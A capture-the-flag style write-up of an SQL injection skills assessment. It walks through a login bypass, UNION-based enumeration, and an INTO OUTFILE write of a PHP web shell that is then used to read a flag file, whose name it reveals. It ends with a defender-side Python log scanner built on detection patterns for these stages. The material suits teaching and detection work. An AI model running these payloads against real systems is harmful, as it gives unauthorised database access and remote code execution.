Skills Assessment SQL Injection Fundamentals
Task
The company Inlanefreight has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a “grey box” approach, checking for the existence of SQL injection vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered to complete this module. Don’t forget to think outside the box!
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
Attempt
A single quote (') on its own didn't even return an error message, but ' OR 1=1-- - worked and I was able to log in to the payroll information website.
There’s a search function so I tried this payload:
' ORDER BY 5-- -
This worked, but ORDER BY 6 returned an error, so the query returns 5 columns.
I tried to find out the current user:
' UNION SELECT NULL,NULL,NULL,USER(),NULL-- -
This returned root@localhost. Next I checked the privileges:
' UNION SELECT 1, 2, 3, grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
The user had the FILE privilege.
Then I checked secure_file_priv to see whether I could write files:
' UNION SELECT 1,2,3, variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
It's empty, so the restriction isn't enabled, meaning I can write files.
So I wrote a web shell:
' union select "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
But this returned the error: Can't create/write to file '/var/www/html/shell.php' (Errcode: 13 "Permission denied")
Of the three conditions for writing a file through SQL injection:
- User with FILE privilege enabled
- MySQL global secure_file_priv variable not enabled
- Write access to the location we want to write to on the back-end server
1 and 2 are met, so 3 must be the problem.
I tweaked the path a bit:
' union select "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/dashboard/shell.php'-- -
I was then able to access http://94.237.59.30:42697/dashboard/shell.php?0=whoami. Now I had to find the flag. Passing ls+/ as the command revealed the flag file flag_cae1dadcd174.txt, and I obtained the flag with cat+/flag_cae1dadcd174.txt.
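As an added defender-side example (not part of the original write-up), the following Python scans Apache access-log lines for the stages this attack chain leaves behind and correlates an INTO OUTFILE path with a later request to the dropped file. The log lines and client IPs are constructed for the example, and the document root /var/www/html is assumed from the outfile path used above.

```python
import re
from urllib.parse import unquote_plus

WEBROOT = "/var/www/html"  # assumed document root, as in the write-up's outfile path

# Constructed Apache combined-format lines modelled on this write-up's payloads
# (not captured from the target). The login bypass rides in a POST body, so it
# leaves nothing in an access log.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Oct/2023:12:00:01 +0000] "POST /login.php HTTP/1.1" 302 0
10.10.14.5 - - [10/Oct/2023:12:00:09 +0000] "GET /dashboard/search.php?q=%27+ORDER+BY+5--+- HTTP/1.1" 200 1821
10.10.14.5 - - [10/Oct/2023:12:00:15 +0000] "GET /dashboard/search.php?q=%27+UNION+SELECT+NULL,NULL,NULL,USER(),NULL--+- HTTP/1.1" 200 1903
10.10.14.5 - - [10/Oct/2023:12:00:31 +0000] "GET /dashboard/search.php?q=%27+UNION+SELECT+1,2,3,grantee,privilege_type+FROM+information_schema.user_privileges--+- HTTP/1.1" 200 2410
10.10.14.5 - - [10/Oct/2023:12:00:58 +0000] "GET /dashboard/search.php?q=%27+union+select+%22%22,%22%22,%27%3C%3Fphp+system(%24_REQUEST%5B0%5D)%3B+%3F%3E%27,%22%22,%22%22+into+outfile+%27/var/www/html/dashboard/shell.php%27--+- HTTP/1.1" 200 1790
10.10.14.5 - - [10/Oct/2023:12:01:02 +0000] "GET /dashboard/shell.php?0=whoami HTTP/1.1" 200 12
10.10.14.9 - - [10/Oct/2023:12:01:30 +0000] "GET /dashboard/search.php?q=smith HTTP/1.1" 200 1650
"""

# Matched against the URL-decoded, lower-cased request target.
STAGES = [
    ("column enumeration", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union-based injection", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema reconnaissance", re.compile(r"\binformation_schema\.")),
    ("file write (INTO OUTFILE)", re.compile(r"\binto\s+(?:out|dump)file\s+'([^']+)'")),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan_access_log(text, webroot=WEBROOT):
    """Return (client, labels, decoded_target) per suspicious request; a path named
    in INTO OUTFILE under the webroot that is later requested is webshell execution."""
    findings, dropped = [], set()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        lowered = unquote_plus(target).lower()  # '+' decodes to a space, as in ls+/
        if lowered.split("?", 1)[0] in dropped:
            findings.append((client, ["webshell execution"], unquote_plus(target)))
            continue
        labels = []
        for label, rx in STAGES:
            hit = rx.search(lowered)
            if hit:
                labels.append(label)
                if hit.groups() and hit.group(1).startswith(webroot):
                    dropped.add(hit.group(1)[len(webroot):])  # e.g. /dashboard/shell.php
        if labels:
            findings.append((client, labels, unquote_plus(target)))
    return findings
```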